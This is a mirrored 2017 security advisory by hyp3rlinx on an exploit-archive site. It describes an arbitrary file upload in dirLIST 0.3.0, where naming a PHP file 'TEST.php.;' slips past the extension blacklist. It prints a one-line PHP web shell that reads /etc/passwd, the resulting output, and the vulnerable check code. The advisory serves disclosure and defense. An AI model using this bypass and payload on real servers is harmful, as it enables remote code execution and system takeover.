首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 dirLIST 0.3.0 - Arbitrary File Upload 来源：http://hyp3rlinx.altervista.org 作者：hyp3rlinx 发布时间：2017-01-18   [+]################################################################################################### [+] Credits / Discovery: John Page  [+] Website: hyp3rlinx.altervista.org [+] Source:  http://hyp3rlinx.altervista.org/advisories/DIRLIST-FILE-UPLOAD-BYPASS-CMD-EXEC.txt [+] ISR: Apparition [+]##################################################################################################       Vendor: =============== sourceforge.net     Product: =============== dirList v0.3.0     Download: =========== sourceforge.net/projects/dir-list/     dirLIST displays files and folders in a given HTTP/FTP directory. It has a wonderful interface with choice of Thumbnail or List view along with gorgeous icons for different file types. Includes a sleek gallery, web based mp3 player, file admin + more.       Vulnerability Type: ====================================== Bypass File Upload / CMD Execution       CVE Reference: =============== N/A     Security Issue: ===============   When uploading "Banned" file types dirLIST replies with a base64 encoded error message.   e.g. dXBsb2FkX2Jhbm5lZA==   Decoded it reads, "upload_banned".     Banned files are setup in the "config.php" file.   $banned_file_types = array('.php', '.php3', '.php4', '.php5', '.htaccess', '.htpasswd', '.asp', '.aspx');   When upload a file, the check is made for banned file types.   In "process_upload.php" on Line: 47   if(in_array(strtolower(strrchr($file_name, ".")), $banned_file_types))     {         header("Location: ../index.php?folder=".$_POST['folder']."&err=".base64_encode("upload_banned"));         exit;     }     However, appending a semicolon ";" to end of our PHP file will skirt the security check allowing us to upload a banned PHP file type, and our PHP file will be executed by server when accessed later.   Apache manual: “Files can have more than one extension, and the order of the extensions is normally irrelevant. For example, if the file welcome.html.fr maps onto content type text/html and language French then the file welcome.fr.html will map onto exactly the same information. etc..   Therefore, a file named ‘file.php.1’, can be interpreted as a PHP file and be executed on server. This usually works if the last extension is not specified in the list of mime-types known to the web server.   Developers are usually unaware of the "Apache" feature to process files with some odd unexpected extension like PHP.1, PHP.; and such.     Tested on:   Windows 7 Bitnami wampstack-5.6.29-0. Apache/2.4.23 (Win64)   Linux XAMPP 5.6.8-0 Apache/2.4.12 (Unix)       Exploit/POC: ============   1) Create a banned PHP file to upload named.   "TEST.php.;"   2) Upload to server using dirLIST.     3) Done!     <?php echo passthru('cat /etc/passwd'); ?>   Result:   root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin   etc...       Network Access: =============== Remote       Impact: ================= System Takeover       Severity: =========== High     Disclosure Timeline: ===================== Vendor Notification: No Replies January 17, 2017 : Public Disclosure       [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c) HYP3RLINX   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·WordPress WooCommerce Direct D ·BoZoN 2.4 - Remote Code Execut ·Tenda ADSL2/2+ Modem D840R - U ·SentryHD 02.01.12e - Privilege ·Pirelli DRG A115 ADSL Router - ·Tenda ADSL2/2+ Modem D820R - U ·iSelect v1.4 - Local Buffer Ov ·Pirelli DRG A115 v3 ADSL Route ·WinaXe Plus 8.7 - Buffer Overf ·SunOS 5.11 Remote ICMP Weaknes ·PHP LibGD Heap Buffer Overflow ·DiskSavvy Enterprise 9.1.14 /   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved